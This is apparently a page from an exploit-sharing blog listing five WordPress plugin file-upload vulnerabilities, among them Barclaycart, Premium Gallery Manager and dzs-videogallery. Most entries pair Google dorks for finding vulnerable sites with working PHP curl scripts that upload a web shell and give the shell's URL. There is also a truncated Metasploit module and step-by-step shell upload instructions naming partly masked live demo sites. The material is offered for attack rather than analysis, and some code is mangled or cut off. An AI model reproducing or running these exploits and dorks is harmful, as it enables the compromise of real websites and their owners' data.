wordpress exploits

WP Barclaycart Plugins Arbitrary File Upload Vulnerability

By |March 18th, 2014|

exploit title: WP Barclaycart Plugins Arbitrary File Upload Vulnerability
Author: eX-Sh1Ne
Author Facebook: www.fb.me/ShiNe.gov
Date: 03-2014
GoogleDork: inurl:”wp-content/plugins/barclaycart”

Vulnerable location:

wp-content/plugins/barclaycart/uploadify/uploadify.php

Exploit :

< -?- php $uploadfile="Sh1Ne.php"; $ch = curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”,
‘folder’=>’/wp-content/plugins/barclaycart/uploadify/’));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
– ? ->

Shell Access :

http://localhost/wp-content/plugins/barclaycart/uploadify/Sh1Ne.php
or
http://localhost/wp-content/uploads/[years]/[month]/

Comments Off on WP Barclaycart Plugins Arbitrary File Upload Vulnerability

WP Plugins Premium Gallery Manager Arbitrary File Upload

By |March 18th, 2014|

exploit title: WP Plugins Premium Gallery Manager Arbitrary File Upload
Author: eX-Sh1Ne
Author Facebook: www.fb.me/ShiNe.gov
Date: 03-2014
GoogleDork: inurl:”wp-content/plugins/Premium_Gallery_Manager”

Vulnerable path:
site.com/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php

Exploit:

< -?- php $uploadfile="Sh1Ne.php.jpg"; $ch= curl_init("http://127.0.0.1:8080/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php"); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”,
‘folder’=>’/wp-content/plugins/Premium_Gallery_Manager/uploadify/’));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$postResult=curl_exec($ch);
curl_close($ch);
print”$postResult”;
? >

ShellAccess:

http://localhost:8080/wp-content/plugins/Premium_Gallery_Manager/uploadify/Sh1Ne.php.jpg
or
http://localhost:8080/wp-content/uploads/[years]/[month]/

Comments Off on WP Plugins Premium Gallery Manager Arbitrary File Upload

WordPress amerisale-re Remote file Upload Vulnerability

By |February 8th, 2014|

Exploit Title : WordPress amerisale-re Plugin Remote Shell Upload
Exploit Author : T3rm!nat0r5
Google Dork : inurl:/wp-content/plugins/amerisale-re
Vendor Homepage : http://wordpress.org/
Date : 2014/01/30
Tested on : Windows 8 , Linux
This module requires Metasploit: http//metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework

CoDE:

require ‘msf/core’
class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => ‘WordPress amerisale-re Plugin Remote
Shell Upload’,
‘Description’ => %q{
This module exploits an arbitrary […]

Comments Off on WordPress amerisale-re Remote file Upload Vulnerability
  • wordpress exploits, webapps exploits, wordpress vulnerability, 1337mir
    Permalink wordpress exploits, webapps exploits, wordpress vulnerability, 1337mirGallery

    WordPress dzs-videogallery Plugins Remote File Upload Vulnerability

WordPress dzs-videogallery Plugins Remote File Upload Vulnerability

By |January 3rd, 2014|

Exploit Title: WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
Author: iskorpitx
Date: 22/11/2013
Vendor Homepage: http://digitalzoomstudio.net
Themes Link: http://digitalzoomstudio.net/docs/wpvideogallery/
Infected File: upload.php
Category: webapps
Google dork: inurl:/wp-content/plugins/dzs-videogallery/
Tested on : Windows/Linux
< ? p h p $uploadfile=””; $ch = curl_init(“http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php”); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘file_field’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
print “$postResult”;
?>
uploaded file:
http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/upload.html

Comments Off on WordPress dzs-videogallery Plugins Remote File Upload Vulnerability

WordPress Lazy SEO plugin Shell Upload Vulnerability

By |October 10th, 2013|

exploit Title : WordPress Lazy SEO plugin Shell Upload Vulnerability
Exploit Author : Ashiyane Digital Security Team
Discovered By : ACC3SS
Google Dork: : inurl:/wp-content/plugins/lazy-seo/
Date: 2013/09/21
Vendor Homepage : http://wordpress.org/plugins/lazy-seo
Software Link : http://downloads.wordpress.org/plugin/lazy-seo.1.1.9.zip
Version : 1.1.9
Tested on: Windows

Location:
Site/wp-content/plugins/lazy-seo/lazyseo.php
1.Go to address : Site/wp-content/plugins/lazy-seo/lazyseo.php
2.Click on Browse…
3.Select Shell Code
3.Complete the fields
4.Press Enter
5.Shell Address : wp-content/plugins/lazy-seo/Shell.php

Demo:
http://www.dXus.com/wp-content/plugins/lazy-seo/lazyseo.php
http://noteclX.com/wp-content/plugins/lazy-seo/lazyseo.php

Comments Off on WordPress Lazy SEO plugin Shell Upload Vulnerability